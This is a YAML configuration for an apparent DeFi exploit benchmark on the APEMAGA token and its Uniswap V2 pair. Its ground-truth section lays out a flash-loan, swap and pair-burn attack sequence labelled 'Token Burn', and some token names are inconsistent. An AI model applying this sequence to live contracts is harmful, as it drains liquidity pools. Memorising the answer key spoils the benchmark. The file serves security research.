# Information for benchmarks building.
project_name: "APEMAGA"

ctrt_name2cls:
  - ["wbnb", "WBNB"]
  - ["apemaga", "APEMAGA"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]

ctrt_name2deploy:
  - ["wbnb", ""]
  - ["apemaga", "new APEMAGA(\"HCT\", \"XAI\", 9, 91159088068)"]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]
  
extra_actions: 
 - "function burn_apemaga_pair(uint256 amount) internal eurus {
      apemaga.family(address(pair));
  }"

extra_deployments: [] 

extra_statements: []

attack_goal_str: "wbnb; 1e12"

groundtruth:
  - ["borrow", "wbnb", "owner", "2200 * 1e18"]
  - ["swap", "pair", "attacker", "wbnb", "apemaga", "wbnb.balanceOf(attacker)", "pair.getAmountOut(wbnb.balanceOf(attacker), address(wbnb)) * 99 / 100"]
  - ["burn", "apemaga", "pair", "0"]
  # - ["swap", "pair", "attacker", "hct", "wbnb", "hct.balanceOf(attacker)", "pair.getAmountOut(hct.balanceOf(attacker), address(hct))"]
  # - ["payback", "wbnb", "owner", "2200 * 1e18"]

# Information for search space building.
roles:
  "wbnb":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "apemaga":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "pair":
    is_swappair: true
    is_uniswap: true
    token_pair: ["apemaga", "wbnb"]
    support_swaps:
      "apemaga": ["apemaga", "wbnb"]
      "wbnb": ["apemaga", "wbnb"]
    is_oracle: true
    oracle: "pair"

pattern: "Token Burn"
